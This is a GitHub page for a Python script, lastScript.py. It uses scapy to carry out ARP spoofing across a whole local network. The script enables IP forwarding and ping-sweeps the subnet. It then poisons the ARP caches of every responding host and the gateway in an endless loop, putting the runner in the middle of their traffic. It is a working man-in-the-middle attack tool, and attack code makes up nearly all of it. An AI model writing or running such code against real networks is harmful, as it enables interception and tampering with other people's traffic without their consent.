-
Notifications
You must be signed in to change notification settings - Fork 0
/
lastScript.py
148 lines (124 loc) · 4.49 KB
/
lastScript.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
from scapy.all import Ether, ARP, srp, send
import argparse
import socket
import time
import os
import sys
import subprocess
import multiprocessing.dummy
import multiprocessing
def diff(first, second):
second = set(second)
return [item for item in first if item not in second]
def get_gateway():
with open("/proc/net/route") as fh:
for line in fh:
fields = line.strip().split()
if fields[1] != '00000000' or not int(fields[3], 16) & 2:
# If not default route or not RTF_GATEWAY, skip it
continue
return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))
def get_masc(): #получение gateway
self_ip = get_gateway().split('.')
self_ip = self_ip[0] + '.' + self_ip[1] + '.' + self_ip[2] + '.'
return self_ip
def enable_ip_route(verbose=True):
"""
Enables IP forwarding
"""
if verbose:
print("[!] Enabling IP Routing...")
file_path = "/proc/sys/net/ipv4/ip_forward"
with open(file_path) as f:
if f.read() == 1:
# already enabled
return
with open(file_path, "w") as f:
print(1, file=f)
if verbose:
print("[!] IP Routing enabled.")
def get_mac(ip):
"""
Returns MAC address of any device connected to the network
If ip is down, returns None instead
"""
ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0)
if ans:
return ans[0][1].src
def get_self_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def ip4_addresses():
ips = []
masc = get_masc()
for i in range(1, 255):
ips.append(masc + str(i))
print("Try find all available ips")
return list(filter(lambda ip: ip is not None, ping_range(ips)))
def spoof(target_ip, host_ip, verbose=True):
"""
Spoofs `target_ip` saying that we are `host_ip`.
it is accomplished by changing the ARP cache of the target (poisoning)
"""
# get the mac address of the target
target_mac = get_mac(target_ip)
# craft the arp 'is-at' operation packet, in other words; an ARP response
# we don't specify 'hwsrc' (source MAC address)
# because by default, 'hwsrc' is the real MAC address of the sender (ours)
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
# send the packet
# verbose = 0 means that we send the packet without printing any thing
send(arp_response, verbose=0)
if verbose:
# get the MAC address of the default interface we are using
self_mac = ARP().hwsrc
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
def restore(target_ip, host_ip, verbose=True):
"""
Restores the normal process of a regular network
This is done by sending the original informations
(real IP and MAC of `host_ip` ) to `target_ip`
"""
# get the real MAC address of target
target_mac = get_mac(target_ip)
# get the real MAC address of spoofed (gateway, i.e router)
host_mac = get_mac(host_ip)
# crafting the restoring packet
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac, op="is-at")
# sending the restoring packet
# to restore the network to its normal process
# we send each reply seven times for a good measure (count=7)
send(arp_response, verbose=0, count=7)
if verbose:
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
def ping_range(ips):
num_threads = 2 * multiprocessing.cpu_count()
p = multiprocessing.dummy.Pool(num_threads)
results = p.map(ping, ips)
p.close()
p.join()
return results
def ping(ip):
ret = os.system("ping -q -c 1 -W 1 " + ip)
if ret == 0:
return ip
else:
return None
def spoof_all(targets, host, verbose=False):
while True:
for target in targets:
print("Spoof " + target)
spoof(target, host, verbose)
spoof(host, target, verbose)
time.sleep(1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ARP spoof script")
parser.add_argument("-v", "--verbose", action="store_true", help="verbosity, default is True (simple message each second)")
args = parser.parse_args()
verbose = args.verbose
enable_ip_route()
host = get_gateway()
exclude = [get_self_ip(), host]
targets = diff(ip4_addresses(), exclude)
spoof_all(targets, host, verbose)